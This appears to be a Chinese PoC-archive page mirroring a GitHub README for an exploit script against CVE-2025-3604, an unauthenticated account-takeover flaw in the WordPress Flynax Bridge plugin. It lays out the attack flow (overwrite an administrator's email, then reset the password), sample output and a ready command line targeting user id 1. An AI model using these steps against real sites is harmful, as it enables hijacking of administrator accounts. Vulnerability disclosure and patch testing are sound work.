支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: a5a79738b8543eccf9980496da821558c81f9f8c

来源
https://github.com/Nxploited/CVE-2025-3604
关联漏洞
标题:WordPress plugin Flynax Bridge 安全漏洞 (CVE-2025-3604)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Flynax Bridge 2.2.0及之前版本存在安全漏洞,该漏洞源于未正确验证用户身份,可能导致账户接管和权限提升。
Description
Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover
介绍

# 🚨 Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover

## 📄 Description

The **Flynax Bridge** plugin for WordPress is vulnerable to **privilege escalation via account takeover** in all versions up to, and including, `2.2.0`.

This is due to the plugin not properly validating a user's identity prior to updating their account details (such as email). As a result, **unauthenticated attackers** can change the email address of **any user**, including **administrators**, and then initiate a **password reset** to fully take over the account.

> **CVE**: CVE-2025-3604  
> **CVSS**: 9.8 (Critical)  
> **Published**: April 23, 2025  
> **Last Updated**: April 24, 2025

---

## ⚙️ Script Output Example

```
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: user@admin.sa
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
```

After successful exploitation, the attacker can go to the WordPress login page and click on **"Lost your password?"** using the **newly set email** to reset the password and gain full access to the targeted account.

---

## 🚀 Usage

```
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit
```

---

## 🧪 Example

```
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "attack@attacker.com"
```

### Explanation:

- `-u`: Base URL of the WordPress site.
- `-id`: ID of the user to target (typically 1 for admin).
- `-mail`: New email that will be set for that user.

---
## ⚠️ Disclaimer
 Use at your own risk. For authorized testing and educational purposes only.




### 🧑‍💻
*BY: Nxploited ( Khaled_alenazi )*
文件快照

 [4.0K]  /data/pocs/a5a79738b8543eccf9980496da821558c81f9f8c
├── [3.4K]  CVE-2025-3604.py
├── [1.1K]  LICENSE
└── [2.0K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。